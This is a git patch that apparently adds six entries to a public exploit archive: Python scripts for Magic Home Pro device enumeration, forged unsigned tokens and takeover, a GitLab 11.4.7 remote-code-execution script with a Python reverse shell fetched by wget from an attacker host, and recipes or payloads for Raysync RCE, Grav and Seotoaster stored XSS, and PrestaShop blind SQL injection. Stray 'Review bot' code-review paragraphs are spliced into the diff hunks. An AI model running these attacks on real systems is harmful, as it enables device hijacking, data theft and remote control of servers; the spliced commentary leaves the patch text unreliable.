From 58ad270f640ef1e9de2f9d320e3133690ffb81ae Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 17 Dec 2020 05:01:57 +0000
Subject: [PATCH] DB: 2020-12-17
6 changes to exploits/shellcodes
Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption
Adobe (Multiple Products) - XML Injection File Content Disclosure
GitLab 11.4.7 - Remote Code Execution (Authenticated)
Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting
Raysync 3.3.3.8 - RCE
Magic Home Pro 1.5.1 - Authentication Bypass
PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
Seotoaster 3.2.0 - Stored XSS on Edit page properties
---
 exploits/android/webapps/49266.py | 292 ++++++++++++++++++++++++++++++
 exploits/linux/webapps/49265.txt | 25 +++
 exploits/php/webapps/49264.txt | 45 +++++
 exploits/php/webapps/49267.txt | 14 ++
 exploits/php/webapps/49268.txt | 29 +++
 exploits/ruby/webapps/49263.py | 262 +++++++++++++++++++++++++++
 files_exploits.csv | 10 +-
 7 files changed, 675 insertions(+), 2 deletions(-)
 create mode 100755 exploits/android/webapps/49266.py
 create mode 100644 exploits/linux/webapps/49265.txt
 create mode 100644 exploits/php/webapps/49264.txt
 create mode 100644 exploits/php/webapps/49267.txt
 create mode 100644 exploits/php/webapps/49268.txt
 create mode 100755 exploits/ruby/webapps/49263.py
diff --git a/exploits/android/webapps/49266.py b/exploits/android/webapps/49266.py
new file mode 100755
index 000000000..bd5b0c746
--- /dev/null
+++ b/exploits/android/webapps/49266.py
@@ -0,0 +1,292 @@ +# Exploit Title: Magic Home Pro 1.5.1 - Authentication Bypass +# Google Dork: NA +# Date: 22 October 2020 +# Exploit Author: Victor Hanna (Trustwave SpiderLabs) +# Author Github Page: https://9lyph.github.io/CVE-2020-27199/ +# Vendor Homepage: http://www.zengge.com/appkzd +# Software Link: https://play.google.com/store/apps/details?id=com.zengge.wifi&hl=en +# Version: 1.5.1 (REQUIRED) +# Tested on: Android 10 + +## Enumeration ## + +import requests +import json +import os +from colorama import init +from colorama import Fore, Back, Style +import re + +''' +1. First Stage Authentication +2. Second Stage Enumerate +3. Third Stage Remote Execute +''' + +global found_macaddresses +found_macaddresses = [] +global outtahere +outtahere = "" +q = "q" +global token + + +def turnOn(target, token): + + urlOn = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001" + array = { + "dataCommandItems":[ + {"hexData":"71230fa3","macAddress":target} + ] + } + data = json.dumps(array) + headersOn = { + "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)", + "Accept-Language": "en-US", + "Accept": "application/json", + "Content-Type": "application/json; charset=utf-8", + "token":token, + "Host": "wifij01us.magichue.net", + "Connection": "close", + "Accept-Encoding": "gzip, deflate" + } + print (Fore.WHITE + "[+] Sending Payload ...") + response = requests.post(urlOn, data=data, headers=headersOn) + if response.status_code == 200: + if "true" in response.text: + print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched On") + else: + print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}") + +def turnOff(target, token): + + urlOff = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001" + array = { + "dataCommandItems":[ + {"hexData":"71240fa4","macAddress":target} + ] + } + data = json.dumps(array) + headersOff = { + "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)", + "Accept-Language": "en-US", 
+ "Accept": "application/json", + "Content-Type": "application/json; charset=utf-8", + "token":token, + "Host": "wifij01us.magichue.net", + "Connection": "close", + "Accept-Encoding": "gzip, deflate" + } + print (Fore.WHITE + "[+] Sending Payload ...") + response = requests.post(urlOff, data=data, headers=headersOff) + if response.status_code == 200: + if "true" in response.text: + print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched Off") + else: + print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}") + +def lighItUp(target, token): + + outtahere = "" + q = "q" + if len(str(target)) < 12: + print (Fore.RED + "[!] Invalid target" + Style.RESET_ALL) + elif re.match('[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}$', target.lower()): + while outtahere.lower() != q.lower(): + if outtahere == "0": + turnOn(target, token) + elif outtahere == "1": + turnOff(target, token) + outtahere = input(Fore.BLUE + "ON/OFF/QUIT ? 
(0/1/Q): " + Style.RESET_ALL) + +def Main(): + urlAuth = "https://wifij01us.magichue.net/app/login/ZG001" + + data = { + "userID":"", + "password":"", + "clientID":"" + } + + headersAuth = { + "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)", + "Accept-Language": "en-US", + "Accept": "application/json", + "Content-Type": "application/json; charset=utf-8", + "Host": "wifij01us.magichue.net", + "Connection": "close", + "Accept-Encoding": "gzip, deflate" + } + + # First Stage Authenticate + + os.system('clear') + print (Fore.WHITE + "[+] Authenticating ...") + response = requests.post(urlAuth, json=data, headers=headersAuth) + resJsonAuth = response.json() + token = (resJsonAuth['token']) + + # Second Stage Enumerate + + print (Fore.WHITE + "[+] Enumerating ...") + macbase = "C82E475DCE" + macaddress = [] + a = ["%02d" % x for x in range(100)] + for num in a: + macaddress.append(macbase+num) + + with open('loot.txt', 'w') as f: + for mac in macaddress: + urlEnum = "https://wifij01us.magichue.net/app/getBindedUserListByMacAddress/ZG001" + params = { + "macAddress":mac + } + + headersEnum = { + "User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)", + "Accept-Language": "en-US", + "Content-Type": "application/json; charset=utf-8", + "Accept": "application/json", + "token": token, + "Host": "wifij01us.magichue.net", + "Connection": "close", + "Accept-Encoding": "gzip, deflate" + } + + response = requests.get(urlEnum, params=params, headers=headersEnum) + resJsonEnum = response.json() + data = (resJsonEnum['data']) + if not data: + pass + elif data: + found_macaddresses.append(mac) + print (Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}") + f.write(Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + 
Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}\n") + else: + print (Fore.RED + "[-] No results found!") + print(Style.RESET_ALL) + + if not found_macaddresses: + print (Fore.RED + "[-] No MAC addresses retrieved") + elif found_macaddresses: + attackboolean = input(Fore.BLUE + "Would you like to Light It Up ? (y/N): " + Style.RESET_ALL) + if (attackboolean.upper() == 'Y'): + target = input(Fore.RED + "Enter a target device mac address: " + Style.RESET_ALL) + lighItUp(target, token) + elif (attackboolean.upper() == 'N'): + print (Fore.CYAN + "Sometimes, belief isn’t about what we can see. It’s about what we can’t."+ Style.RESET_ALL) + else: + print (Fore.CYAN + "The human eye is a wonderful device. With a little effort, it can fail to see even the most glaring injustice." + Style.RESET_ALL) + +if __name__ == "__main__": + Main() + +## Token Forging ## + +#!/usr/local/bin/python3 + +import url64 +import requests +import json +import sys +import os +from colorama import init +from colorama import Fore, Back, Style +import re +import time +from wsgiref.handlers import format_date_time +from datetime import datetime +from time import mktime + +now = datetime.now() +stamp = mktime(now.timetuple()) + +''' +HTTP/1.1 200 +Server: nginx/1.10.3 +Content-Type: application/json;charset=UTF-8 +Connection: close + 
+"{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http:\/\/wifij01us.magichue.net\/app\/ota\/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\"\",\"userEmail\":\"\",\"userUniID\":\"\"},\"token\":\"\"}" +''' + +def Usage(): + print (f"Usage: {sys.argv[0]} ") + +def Main(user, uniqid): + os.system('clear') + print ("[+] Encoding ...") + print ("[+] Bypass header created!") + print ("HTTP/1.1 200") + print ("Server: nginx/1.10.3") + print ("Date: "+str(format_date_time(stamp))+"") + print ("Content-Type: application/json;charset=UTF-8") + print ("Connection: close\r\n\r\n") + + jwt_header = '{"typ": "JsonWebToken","alg": "None"}' + jwt_data = '{"userID": "'+user+'", "uniID": "'+uniqid+'","cdpid": "ZG001","clientID": "","serverCode": "US","expireDate": 1618264850608,"refreshDate": 1613080850608,"loginDate": 1602712850608}' + jwt_headerEncoded = url64.encode(jwt_header.strip()) + jwt_dataEncoded = url64.encode(jwt_data.strip()) + jwtcombined = (jwt_headerEncoded.strip()+"."+jwt_dataEncoded.strip()+".") + print ("{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http://wifij01us.magichue.net/app/ota/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\""+user+"\",\"userEmail\":\""+user+"\",\"userUniID\":\""+uniqid+"\"},\"token\":\""+jwtcombined+"\"}") + +if __name__ == "__main__": 
+ if len(sys.argv) < 3: + Usage() + else: + Main(sys.argv[1], sys.argv[2]) + +## Device Takeover PoC ## + +#!/usr/local/bin/python3 + +import url64 +import requests +import json +import sys +import os +from colorama import init +from colorama import Fore, Back, Style +import re + +def Usage(): + print (f"Usage: {sys.argv[0]} ") + +def Main(): + + attacker_email = sys.argv[1] + target_email = sys.argv[2] + target_mac = sys.argv[3] + forged_token = sys.argv[4] + + os.system('clear') + print (Fore.WHITE + "[+] Sending Payload ...") + url = "https://wifij01us.magichue.net/app/shareDevice/ZG001" + + array = {"friendUserID":attacker_email, "macAddress":target_mac} + + data = json.dumps(array) + + headers = { + "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)", + "Accept-Language": "en-US", + "Accept": "application/json", + "Content-Type": "application/json; charset=utf-8", + "token":forged_token, + "Host": "wifij01us.magichue.net", + "Connection": "close", + "Accept-Encoding": "gzip, deflate" + } + + response = requests.post(url, data=data, headers=headers) + if response.status_code == 200: + if "true" in response.text: + print (Fore.GREEN + "[*] Target is now yours ... " + Style.RESET_ALL) + else: + print (Fore.RED + "[-] Failed to take over target !" + Style.RESET_ALL) + +if __name__ == "__main__": + if len(sys.argv) < 5: + Usage() + else: + Main() \ No newline at end of file diff --git a/exploits/linux/webapps/49265.txt b/exploits/linux/webapps/49265.txt new file mode 100644 index 000000000..1a676ee59 --- /dev/null +++ b/exploits/linux/webapps/49265.txt 
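Review bot: The failure branch of turnOff reports the wrong action — it prints `[-] Failed to switch on Endpoint` although that function sends the off command — so the line should read `print (Fore.RED + "[-] Failed to switch off Endpoint " + Style.RESET_ALL + f"{target}")`. The module-level `global token`, `global outtahere` and `global found_macaddresses` statements are no-ops at module scope, and `token` is only ever passed as a parameter, so they can be dropped. The file also stitches three standalone scripts together (`## Enumeration ##`, `## Token Forging ##`, `## Device Takeover PoC ##`), each with its own imports, a redefined `Main` and its own `if __name__ == "__main__":` guard, so executing the file as one program runs all three in sequence; a header comment stating that each section is meant to be saved as a separate file would make that explicit.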
@@ -0,0 +1,25 @@
+# Exploit Title: Raysync 3.3.3.8 - RCE
+# Date: 04/10/2020
+# Exploit Author: XiaoLong Zhu
+# Vendor Homepage: www.raysync.io
+# Version: below 3.3.3.8
+# Tested on: Linux
+
+step1: run RaysyncServer.sh to build a web application on the local
+
+environment, set admin password to 123456 , which will be write to
+
+manage.db file.
+
+step2: curl "file=@manage.db" http://[raysync
+ip]/avatar?account=1&UserId=/../../../../config/manager.db
+
+to override remote manage.db file in server.
+
+step3: login in admin portal with admin/123456.
+
+step4: create a normal file with all permissions in scope.
+
+step5: modify RaySyncServer.sh ,add arbitrary evil command.
+
+step6: trigger rce with clicking "reset" button
\ No newline at end of file
diff --git a/exploits/php/webapps/49264.txt b/exploits/php/webapps/49264.txt
new file mode 100644
index 000000000..1fdab4c98
--- /dev/null
+++ b/exploits/php/webapps/49264.txt
@@ -0,0 +1,45 @@
+# Exploit Title: Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting
+# Date: 13-12-2020
+# Exploit Author: Sagar Banwa
+# Vendor Homepage: https://getgrav.org/
+# Software Link: https://getgrav.org/downloads
+# Version: Grav v1.6.30 - Admin v1.9.18
+# Tested on: Windows 10/Kali Linux
+# Contact: https://www.linkedin.com/in/sagarbanwa/
+
+Step to reproduce :
+
+1) log in to the grav-admin panel
+2) Go to Pages
+3) Click on Add
+4) It will ask to Add Page
+5) fill the following details as below
+ Page Title :
+ Folder Name : sagar_Banwa
+ Parent Page : /(root)
+ Page Template : Default
+ Value : yes
+6) click on the Save button
+7) now Click on Pages again.
+8) your page name will be listed as
+9) Now click on the eye button to see the XSS or you can simply go to http://127.0.0.1/grav-admin/ the XSS will pop-up
+
+-------------------------------------
+
+POST /grav-admin/admin/pages HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 230
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/grav-admin/admin/pages
+Cookie: grav-site-a4a23f1-admin=ehrcji8qpnu8e50r839r4oe2on; grav-site-a4a23f1=u5438b49fft2b5d7610a53ne1d; grav-tabs-state={%22tab-options.routes.registration.Security%22:%22data.Security%22%2C%22tab-content.options.advanced%22:%22data.content%22}
+Upgrade-Insecure-Requests: 1
+
+data%5Btitle%5D=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&data%5Bfolder%5D=sagar_banwa&data%5Broute%5D=%2F&data%5Bname%5D=default&data%5Bvisible%5D=1&data%5Bblueprint%5D=&task=continue&admin-nonce=d488c0d8bdaf2978d50f174942d5279f
+
+-----------------------------
\ No newline at end of file
diff --git a/exploits/php/webapps/49267.txt b/exploits/php/webapps/49267.txt
new file mode 100644
index 000000000..afbecfd5e
--- /dev/null
+++ b/exploits/php/webapps/49267.txt
@@ -0,0 +1,14 @@
+​# Exploit Title: PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
+# Date: 2020-12-15
+# Exploit Author: Frederic ADAM
+# Author contact: contact@fadam.eu
+# Vendor Homepage: https://www.prestashop.com
+# Software Link: https://github.com/PrestaShop/productcomments
+# Version: 4.2.0
+# Tested on: Debian 10
+# CVE : CVE-2020-26248
+
+http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=[SQL]
+
+Example:
+http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2)))a)
\ No newline at end of file
diff --git a/exploits/php/webapps/49268.txt b/exploits/php/webapps/49268.txt
new file mode 100644
index 000000000..8d1d21095
--- /dev/null
+++ b/exploits/php/webapps/49268.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Seotoaster 3.2.0 - Stored XSS on Edit page properties
+# Exploit Author: Hardik Solanki
+# Vendor Homepage: https://www.seotoaster.com/
+# Software Link: https://crm-marketing-automation-platforms.seotoaster.com/
+# Version: 3.2.0
+# Tested on Windows 10
+
+XSS ATTACK:
+Cross-site Scripting (XSS) is a client-side code injection attack. The
+attacker aims to execute malicious scripts in a web browser of the victim
+by including malicious code in a legitimate web page or web application.
+The actual attack occurs when the victim visits the web page or web
+application that executes the malicious code. The web page or web
+application becomes a vehicle to deliver the malicious script to the user’s
+browser. Vulnerable vehicles that are commonly used for Cross-site
+Scripting attacks are forums, message boards, and web pages that allow
+comments.
+
+XSS IMPACT:
+1: Steal the cookie
+2: User redirection to a malicious website
+
+Vulnerable Parameters: Edit page properties
+
+Steps to reproduce:
+1: Navigate to "https://localhost/" and log in with valid credentials.
+2: Then navigates/click on "Edit page properties".
+3: Add the payload "*">*", on "Page header H1 tag" field and click on "Save Page" button. Page Saved succesfully.
+4: Hence XSS will get stored and trigger on the main home/main page.
\ No newline at end of file
diff --git a/exploits/ruby/webapps/49263.py b/exploits/ruby/webapps/49263.py
new file mode 100755
index 000000000..792c682a8
--- /dev/null
+++ b/exploits/ruby/webapps/49263.py
@@ -0,0 +1,262 @@ +# Exploit Title: GitLab 11.4.7 Authenticated Remote Code Execution (No Interaction Required) +# Date: 15th December 2020 +# Exploit Author: Mohin Paramasivam (Shad0wQu35t) +# Software Link: https://about.gitlab.com/ +# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/ +# Tested on: GitLab 11.4.7 CE +# CVE : CVE-2018-19571 (SSRF),CVE-2018-19585 (CRLF) + +import requests +import re +import warnings +from bs4 import BeautifulSoup +import sys +import base64 +import urllib +from random_words import RandomWords +import argparse +import os +import time + + + + +parser = argparse.ArgumentParser(description='GitLab 11.4.7 Authenticated RCE') +parser.add_argument('-U',help='GitLab Username') +parser.add_argument('-P',help='Gitlab Password') +parser.add_argument('-l',help='rev shell lhost') +parser.add_argument('-p',help='rev shell lport ',type=int) +args = parser.parse_args() + + +username = args.U +password = args.P +lhost = args.l +lport = args.p + + +#Retrieve CSRF Token + +warnings.filterwarnings("ignore", category=UserWarning, module='bs4') +gitlab_url = "http://10.129.49.62:5080" +request = requests.Session() +print("[+] Retrieving CSRF token to submit the login form") +time.sleep(1) +page = request.get(gitlab_url+"/users/sign_in") +html_content = page.text +soup = BeautifulSoup(html_content,features="lxml") +token = soup.findAll('meta')[16].get("content") + + +print("[+] CSRF Token : "+token) +time.sleep(1) + + +#Login + +login_info ={ + "authenticity_token": token, + "user[login]": username, + "user[password]": password, + "user[remember_me]": "0" +} + + +login_request = request.post(gitlab_url+"/users/sign_in",login_info) + + +if login_request.status_code==200: + print("[+] Login Successful") + time.sleep(1) + +else: + + print("Login Failed") + print(" ") + sys.exit() + + + + +#Exploitation + +print("[+] Running Exploit") +time.sleep(1) +print("[+] Using IPV6 URL 
'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/ssrf.git' to bypass filter") +time.sleep(1) + +ipv6_url = "git%3A%2F%2F%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A6379%2Ftest%2Fssrf.git" + + +r = RandomWords() +project_name = r.random_word() +project_url = '%s/%s/'%(gitlab_url,username) + +print("[+] Creating Project") +time.sleep(1) +print("[+] Project Name : "+project_name) +time.sleep(1) + +print("[+] Creating Python Reverse Shell") +time.sleep(1) + + +python_shell = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'%(lhost,lport) + + +os.system("touch shell.py") +shell_file = open("shell.py","w") +shell_file.write(python_shell) +shell_file.close() + + +print("[+] Reverse Shell Generated") +time.sleep(1) + +print("[+] Start HTTP Server in current directory") + + +print("Command : python3 -m http.server 80") +time.sleep(2) + +http_server = raw_input("Continue (Y/N) : ") + +if (http_server=="N") or (http_server=="n"): + print("Start HTTP Server before running exploit") + +elif (http_server=="Y") or (http_server=="y"): + + + + print("Run this script twice with options below to get SHELL!") + print("") + print("Option 1 : Download shell.py rev shell to server using wget") + print("Option 2 : Execute shell.py downloaded previously") + + option = raw_input("Option (1/2) : ") + + + if option=="1": + + + + reverse_shell= """\nmulti + sadd resque:gitlab:queues system_hook_push + lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid wget http://%s/shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}" + exec + exec + exec\n""" %(lhost) + + + project_page = request.get(gitlab_url+"/projects/new") + html_content = 
project_page.text + soup = BeautifulSoup(html_content,features="lxml") + project_token = soup.findAll('meta')[16].get("content") + namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value') + urlencoded_token1 = project_token.replace("==","%3D%3D") + urlencoded_token_final = urlencoded_token1.replace("+","%2B") + + + payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name) + + + + + + + proxies = { + "http" : "http://127.0.0.1:8080", + "https" : "https://127.0.0.1:8080", + } + + cookies = { + 'sidebar_collapsed': 'false', + 'event_filter': 'all', + 'hide_auto_devops_implicitly_enabled_banner_1': 'false', + '_gitlab_session':request.cookies['_gitlab_session'], + } + + headers = { + 'Host': '10.129.49.31:5080', + 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Referer': 'http://10.129.49.31:5080/projects', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Content-Length': '398', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1', + } + + + + #response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False) + + response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False) + print("[+] Success!") + time.sleep(1) + print("[+] Run Exploit with Option 2") + + + elif option=="2": + + reverse_shell= """\nmulti + sadd resque:gitlab:queues system_hook_push + lpush resque:gitlab:queue:system_hook_push 
"{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid python3 shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}" + exec + exec + exec\n""" + + + + + project_page = request.get(gitlab_url+"/projects/new") + html_content = project_page.text + soup = BeautifulSoup(html_content,features="lxml") + project_token = soup.findAll('meta')[16].get("content") + namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value') + urlencoded_token1 = project_token.replace("==","%3D%3D") + urlencoded_token_final = urlencoded_token1.replace("+","%2B") + + + payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name) + + + + + + + proxies = { + "http" : "http://127.0.0.1:8080", + "https" : "https://127.0.0.1:8080", + } + + cookies = { + 'sidebar_collapsed': 'false', + 'event_filter': 'all', + 'hide_auto_devops_implicitly_enabled_banner_1': 'false', + '_gitlab_session':request.cookies['_gitlab_session'], + } + + headers = { + 'Host': '10.129.49.31:5080', + 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Referer': 'http://10.129.49.31:5080/projects', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Content-Length': '398', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1', + } + + + + #response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False) + + 
response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False) + print("[+] Success!") + time.sleep(1) + print("[+] Spawning Reverse Shell") \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1bda1cfd5..55c7f9931 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11228,7 +11228,7 @@ id,file,description,date,author,type,platform,port 49203,exploits/windows/local/49203.txt,"Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path",2020-12-07,"Mohammed Alshehri",local,windows, 49205,exploits/windows/local/49205.txt,"Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path",2020-12-07,"Ismael Nava",local,windows, 49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows, -49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Thomas Sluyter",local,multiple, +49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Tess Sluyter",local,multiple, 49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows, 49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows, 49259,exploits/linux/local/49259.c,"libbabl 0.1.62 - Broken Double Free Detection (PoC)",2020-12-15,"Carter Yagemann",local,linux, 
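Review bot: The target host is hard-coded inconsistently within this hunk: `gitlab_url = "http://10.129.49.62:5080"` near the top, while the `Host` and `Referer` headers in both option branches name `10.129.49.31:5080`, and the fixed `'Content-Length': '398'` header does not match a body whose length varies with the project name and token. The `proxies` dictionary pointing at `127.0.0.1:8080` and the commented-out `#response = request.post(...)` line in each branch read as debugging leftovers that the commit should have cleaned up. The two `option` branches duplicate roughly fifty lines that differ only in the `reverse_shell` string, so the request construction belongs in one helper that takes that string as its argument. `soup.findAll('meta')[16].get("content")` selects the CSRF token by position and deserves a comment explaining why index 16 is the right one.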
@@ -40317,7 +40317,7 @@ id,file,description,date,author,type,platform,port
 42090,exploits/multiple/webapps/42090.txt,"KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution",2017-05-30,SecuriTeam,webapps,multiple,
 42091,exploits/windows/webapps/42091.txt,"IBM Informix Dynamic Server / Informix Open Admin Tool - DLL Injection / Remote Code Execution / Heap Buffer Overflow",2017-05-30,SecuriTeam,webapps,windows,
 41849,exploits/php/webapps/41849.txt,"Jobscript4Web 4.5 - Authentication Bypass",2017-04-08,TurkCyberArmy,webapps,php,
-41855,exploits/xml/webapps/41855.sh,"Adobe (Multiple Products) - XML Injection File Content Disclosure",2017-04-07,"Thomas Sluyter",webapps,xml,8400
+41855,exploits/xml/webapps/41855.sh,"Adobe (Multiple Products) - XML Injection File Content Disclosure",2017-04-07,"Tess Sluyter",webapps,xml,8400
 41856,exploits/php/webapps/41856.txt,"MyClassifiedScript 5.1 - SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php,
 41858,exploits/php/webapps/41858.txt,"Social Directory Script 2.0 - SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php,
 41859,exploits/php/webapps/41859.txt,"FAQ Script 3.1.3 - 'category_id' SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php,
@@ -43481,3 +43481,9 @@ id,file,description,date,author,type,platform,port
 49258,exploits/php/webapps/49258.txt,"Task Management System 1.0 - 'page' Local File Inclusion",2020-12-15,"İsmail BOZKURT",webapps,php,
 49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)",2020-12-15,"Andrea Bruschi",webapps,php,
 49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware,
+49263,exploits/ruby/webapps/49263.py,"GitLab 11.4.7 - Remote Code Execution (Authenticated)",2020-12-16,"Mohin Paramasivam",webapps,ruby,
+49264,exploits/php/webapps/49264.txt,"Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting",2020-12-16,"Sagar Banwa",webapps,php,
+49265,exploits/linux/webapps/49265.txt,"Raysync 3.3.3.8 - RCE",2020-12-16,james,webapps,linux,
+49266,exploits/android/webapps/49266.py,"Magic Home Pro 1.5.1 - Authentication Bypass",2020-12-16,"Victor Hanna",webapps,android,
+49267,exploits/php/webapps/49267.txt,"PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection",2020-12-16,"Frederic ADAM",webapps,php,
+49268,exploits/php/webapps/49268.txt,"Seotoaster 3.2.0 - Stored XSS on Edit page properties",2020-12-16,"Hardik Solanki",webapps,php,
